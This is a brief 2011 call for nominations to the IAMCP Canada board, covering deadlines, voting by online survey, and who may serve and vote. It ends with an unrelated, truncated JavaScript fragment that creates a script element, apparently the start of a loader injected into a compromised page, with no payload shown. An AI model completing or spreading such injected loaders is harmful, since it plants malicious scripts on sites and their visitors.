IAMCP Canada Board Elections – Nominate Yourself and Get Involved
December 5, 2011
consider nominating yourself. This year promises to be an exciting year.
Canada will work closely with Microsoft and IAMCP International in helping
to pull off the best WPC conference ever, taking place in Toronto in July
Nominations are open until midnight on Friday, December 9, 2011. Send an
email to Acting Canadian President, Gail Mercer-MacKay –
firstname.lastname@example.org if you would like to
nominate yourself for one of six board positions.
Voting will take place via an online survey on Tuesday, December 13, 2011.
(Note: If you are not interested in a Board position, but would like to get
more involved in IAMCP, please send an email indicating your interest and we
will contact you after the elections with more information.)
Who is eligible to serve on the IAMCP Canada Board?
* Only staff from Gold and Silver partners may serve on the IAMCP
* Only one representative per company may serve on the IAMCP Canada
Who is eligible to vote in these elections?
* Only corporate members can vote. The primary IAMCP contact from
your company should submit the vote.
How is voting done?
* Voting will be completed using an online survey tool.
How do I know if I am a Corporate Member?
* If you are unsure, contact email@example.com
to find out.
- Gail Mercer-MacKay
- Email: Gail@MercerMackay.com
var d=document;var s=d.createElement(‘script’);